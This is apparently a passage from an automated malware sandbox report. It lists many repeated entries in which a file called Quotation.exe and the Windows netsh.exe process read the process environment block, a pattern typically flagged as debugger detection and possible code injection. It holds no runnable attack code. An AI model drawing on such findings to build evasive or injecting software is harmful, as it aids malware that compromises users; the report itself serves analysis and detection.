          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFDB40 mov eax, dword ptr fs:[00000030h]1_2_00BFDB40
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8CD6 mov eax, dword ptr fs:[00000030h]1_2_00CC8CD6
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB14FB mov eax, dword ptr fs:[00000030h]1_2_00CB14FB
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76CF0 mov eax, dword ptr fs:[00000030h]1_2_00C76CF0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76CF0 mov eax, dword ptr fs:[00000030h]1_2_00C76CF0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76CF0 mov eax, dword ptr fs:[00000030h]1_2_00C76CF0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0849B mov eax, dword ptr fs:[00000030h]1_2_00C0849B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A44B mov eax, dword ptr fs:[00000030h]1_2_00C2A44B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8C450 mov eax, dword ptr fs:[00000030h]1_2_00C8C450
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8C450 mov eax, dword ptr fs:[00000030h]1_2_00C8C450
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1746D mov eax, dword ptr fs:[00000030h]1_2_00C1746D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC740D mov eax, dword ptr fs:[00000030h]1_2_00CC740D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC740D mov eax, dword ptr fs:[00000030h]1_2_00CC740D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC740D mov eax, dword ptr fs:[00000030h]1_2_00CC740D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]1_2_00CB1C06
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]1_2_00C76C0A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]1_2_00C76C0A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]1_2_00C76C0A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]1_2_00C76C0A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2BC2C mov eax, dword ptr fs:[00000030h]1_2_00C2BC2C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]1_2_00C76DC9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]1_2_00C76DC9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]1_2_00C76DC9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov ecx, dword ptr fs:[00000030h]1_2_00C76DC9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]1_2_00C76DC9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]1_2_00C76DC9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0D5E0 mov eax, dword ptr fs:[00000030h]1_2_00C0D5E0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0D5E0 mov eax, dword ptr fs:[00000030h]1_2_00C0D5E0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]1_2_00CBFDE2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]1_2_00CBFDE2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]1_2_00CBFDE2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]1_2_00CBFDE2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]1_2_00BF2D8A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]1_2_00BF2D8A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]1_2_00BF2D8A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]1_2_00BF2D8A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]1_2_00BF2D8A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CA8DF1 mov eax, dword ptr fs:[00000030h]1_2_00CA8DF1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2FD9B mov eax, dword ptr fs:[00000030h]1_2_00C2FD9B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2FD9B mov eax, dword ptr fs:[00000030h]1_2_00C2FD9B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC05AC mov eax, dword ptr fs:[00000030h]1_2_00CC05AC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC05AC mov eax, dword ptr fs:[00000030h]1_2_00CC05AC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C235A1 mov eax, dword ptr fs:[00000030h]1_2_00C235A1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C21DB5 mov eax, dword ptr fs:[00000030h]1_2_00C21DB5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C21DB5 mov eax, dword ptr fs:[00000030h]1_2_00C21DB5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C21DB5 mov eax, dword ptr fs:[00000030h]1_2_00C21DB5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C33D43 mov eax, dword ptr fs:[00000030h]1_2_00C33D43
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C73540 mov eax, dword ptr fs:[00000030h]1_2_00C73540
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFAD30 mov eax, dword ptr fs:[00000030h]1_2_00BFAD30
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C17D50 mov eax, dword ptr fs:[00000030h]1_2_00C17D50
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1C577 mov eax, dword ptr fs:[00000030h]1_2_00C1C577
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1C577 mov eax, dword ptr fs:[00000030h]1_2_00C1C577
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C7A537 mov eax, dword ptr fs:[00000030h]1_2_00C7A537
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBE539 mov eax, dword ptr fs:[00000030h]1_2_00CBE539
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C03D34 mov eax, dword ptr fs:[00000030h]1_2_00C03D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8D34 mov eax, dword ptr fs:[00000030h]1_2_00CC8D34
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24D3B mov eax, dword ptr fs:[00000030h]1_2_00C24D3B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24D3B mov eax, dword ptr fs:[00000030h]1_2_00C24D3B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24D3B mov eax, dword ptr fs:[00000030h]1_2_00C24D3B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C38EC7 mov eax, dword ptr fs:[00000030h]1_2_00C38EC7
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAFEC0 mov eax, dword ptr fs:[00000030h]1_2_00CAFEC0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C236CC mov eax, dword ptr fs:[00000030h]1_2_00C236CC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8ED6 mov eax, dword ptr fs:[00000030h]1_2_00CC8ED6
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C216E0 mov ecx, dword ptr fs:[00000030h]1_2_00C216E0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C076E2 mov eax, dword ptr fs:[00000030h]1_2_00C076E2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8FE87 mov eax, dword ptr fs:[00000030h]1_2_00C8FE87
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C746A7 mov eax, dword ptr fs:[00000030h]1_2_00C746A7
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC0EA5 mov eax, dword ptr fs:[00000030h]1_2_00CC0EA5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC0EA5 mov eax, dword ptr fs:[00000030h]1_2_00CC0EA5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC0EA5 mov eax, dword ptr fs:[00000030h]1_2_00CC0EA5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]1_2_00C07E41
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]1_2_00C07E41
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]1_2_00C07E41
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]1_2_00C07E41
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]1_2_00C07E41
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C07E41 mov eax, dword ptr fs:[00000030h]1_2_00C07E41
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAE44 mov eax, dword ptr fs:[00000030h]1_2_00CBAE44
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAE44 mov eax, dword ptr fs:[00000030h]1_2_00CBAE44
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFE620 mov eax, dword ptr fs:[00000030h]1_2_00BFE620
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0766D mov eax, dword ptr fs:[00000030h]1_2_00C0766D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]1_2_00C1AE73
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]1_2_00C1AE73
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]1_2_00C1AE73
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]1_2_00C1AE73
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1AE73 mov eax, dword ptr fs:[00000030h]1_2_00C1AE73
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC600 mov eax, dword ptr fs:[00000030h]1_2_00BFC600
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC600 mov eax, dword ptr fs:[00000030h]1_2_00BFC600
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC600 mov eax, dword ptr fs:[00000030h]1_2_00BFC600
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C28E00 mov eax, dword ptr fs:[00000030h]1_2_00C28E00
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1608 mov eax, dword ptr fs:[00000030h]1_2_00CB1608
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A61C mov eax, dword ptr fs:[00000030h]1_2_00C2A61C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A61C mov eax, dword ptr fs:[00000030h]1_2_00C2A61C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAFE3F mov eax, dword ptr fs:[00000030h]1_2_00CAFE3F
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C337F5 mov eax, dword ptr fs:[00000030h]1_2_00C337F5
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77794 mov eax, dword ptr fs:[00000030h]1_2_00C77794
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77794 mov eax, dword ptr fs:[00000030h]1_2_00C77794
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77794 mov eax, dword ptr fs:[00000030h]1_2_00C77794
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C08794 mov eax, dword ptr fs:[00000030h]1_2_00C08794
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0EF40 mov eax, dword ptr fs:[00000030h]1_2_00C0EF40
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF4F2E mov eax, dword ptr fs:[00000030h]1_2_00BF4F2E
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF4F2E mov eax, dword ptr fs:[00000030h]1_2_00BF4F2E
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0FF60 mov eax, dword ptr fs:[00000030h]1_2_00C0FF60
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8F6A mov eax, dword ptr fs:[00000030h]1_2_00CC8F6A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC070D mov eax, dword ptr fs:[00000030h]1_2_00CC070D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC070D mov eax, dword ptr fs:[00000030h]1_2_00CC070D
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A70E mov eax, dword ptr fs:[00000030h]1_2_00C2A70E
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A70E mov eax, dword ptr fs:[00000030h]1_2_00C2A70E
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1F716 mov eax, dword ptr fs:[00000030h]1_2_00C1F716
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8FF10 mov eax, dword ptr fs:[00000030h]1_2_00C8FF10
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8FF10 mov eax, dword ptr fs:[00000030h]1_2_00C8FF10
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2E730 mov eax, dword ptr fs:[00000030h]1_2_00C2E730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348DB40 mov eax, dword ptr fs:[00000030h]8_2_0348DB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349EF40 mov eax, dword ptr fs:[00000030h]8_2_0349EF40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558B58 mov eax, dword ptr fs:[00000030h]8_2_03558B58
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348F358 mov eax, dword ptr fs:[00000030h]8_2_0348F358
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348DB60 mov ecx, dword ptr fs:[00000030h]8_2_0348DB60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349FF60 mov eax, dword ptr fs:[00000030h]8_2_0349FF60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B3B7A mov eax, dword ptr fs:[00000030h]8_2_034B3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B3B7A mov eax, dword ptr fs:[00000030h]8_2_034B3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558F6A mov eax, dword ptr fs:[00000030h]8_2_03558F6A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351FF10 mov eax, dword ptr fs:[00000030h]8_2_0351FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351FF10 mov eax, dword ptr fs:[00000030h]8_2_0351FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0354131B mov eax, dword ptr fs:[00000030h]8_2_0354131B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355070D mov eax, dword ptr fs:[00000030h]8_2_0355070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355070D mov eax, dword ptr fs:[00000030h]8_2_0355070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03484F2E mov eax, dword ptr fs:[00000030h]8_2_03484F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03484F2E mov eax, dword ptr fs:[00000030h]8_2_03484F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BE730 mov eax, dword ptr fs:[00000030h]8_2_034BE730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03491B8F mov eax, dword ptr fs:[00000030h]8_2_03491B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03491B8F mov eax, dword ptr fs:[00000030h]8_2_03491B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353D380 mov ecx, dword ptr fs:[00000030h]8_2_0353D380
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0354138A mov eax, dword ptr fs:[00000030h]8_2_0354138A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03555BA5 mov eax, dword ptr fs:[00000030h]8_2_03555BA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]8_2_03489240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]8_2_03489240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]8_2_03489240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489240 mov eax, dword ptr fs:[00000030h]8_2_03489240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]8_2_03497E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]8_2_03497E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]8_2_03497E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]8_2_03497E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]8_2_03497E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03497E41 mov eax, dword ptr fs:[00000030h]8_2_03497E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349766D mov eax, dword ptr fs:[00000030h]8_2_0349766D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353B260 mov eax, dword ptr fs:[00000030h]8_2_0353B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353B260 mov eax, dword ptr fs:[00000030h]8_2_0353B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C927A mov eax, dword ptr fs:[00000030h]8_2_034C927A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558A62 mov eax, dword ptr fs:[00000030h]8_2_03558A62
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348C600 mov eax, dword ptr fs:[00000030h]8_2_0348C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348C600 mov eax, dword ptr fs:[00000030h]8_2_0348C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348C600 mov eax, dword ptr fs:[00000030h]8_2_0348C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348E620 mov eax, dword ptr fs:[00000030h]8_2_0348E620
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353FE3F mov eax, dword ptr fs:[00000030h]8_2_0353FE3F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558ED6 mov eax, dword ptr fs:[00000030h]8_2_03558ED6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B36CC mov eax, dword ptr fs:[00000030h]8_2_034B36CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0353FEC0 mov eax, dword ptr fs:[00000030h]8_2_0353FEC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B16E0 mov ecx, dword ptr fs:[00000030h]8_2_034B16E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034976E2 mov eax, dword ptr fs:[00000030h]8_2_034976E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351FE87 mov eax, dword ptr fs:[00000030h]8_2_0351FE87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BD294 mov eax, dword ptr fs:[00000030h]8_2_034BD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BD294 mov eax, dword ptr fs:[00000030h]8_2_034BD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]8_2_034852A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]8_2_034852A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]8_2_034852A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]8_2_034852A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034852A5 mov eax, dword ptr fs:[00000030h]8_2_034852A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03550EA5 mov eax, dword ptr fs:[00000030h]8_2_03550EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03550EA5 mov eax, dword ptr fs:[00000030h]8_2_03550EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03550EA5 mov eax, dword ptr fs:[00000030h]8_2_03550EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_035046A7 mov eax, dword ptr fs:[00000030h]8_2_035046A7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BFAB0 mov eax, dword ptr fs:[00000030h]8_2_034BFAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AB944 mov eax, dword ptr fs:[00000030h]8_2_034AB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AB944 mov eax, dword ptr fs:[00000030h]8_2_034AB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C3D43 mov eax, dword ptr fs:[00000030h]8_2_034C3D43
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03503540 mov eax, dword ptr fs:[00000030h]8_2_03503540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A7D50 mov eax, dword ptr fs:[00000030h]8_2_034A7D50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B171 mov eax, dword ptr fs:[00000030h]8_2_0348B171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B171 mov eax, dword ptr fs:[00000030h]8_2_0348B171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AC577 mov eax, dword ptr fs:[00000030h]8_2_034AC577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AC577 mov eax, dword ptr fs:[00000030h]8_2_034AC577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489100 mov eax, dword ptr fs:[00000030h]8_2_03489100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489100 mov eax, dword ptr fs:[00000030h]8_2_03489100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489100 mov eax, dword ptr fs:[00000030h]8_2_03489100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558D34 mov eax, dword ptr fs:[00000030h]8_2_03558D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]8_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]8_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]8_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov eax, dword ptr fs:[00000030h]8_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120 mov ecx, dword ptr fs:[00000030h]8_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B4D3B mov eax, dword ptr fs:[00000030h]8_2_034B4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B4D3B mov eax, dword ptr fs:[00000030h]8_2_034B4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B4D3B mov eax, dword ptr fs:[00000030h]8_2_034B4D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B513A mov eax, dword ptr fs:[00000030h]8_2_034B513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B513A mov eax, dword ptr fs:[00000030h]8_2_034B513A
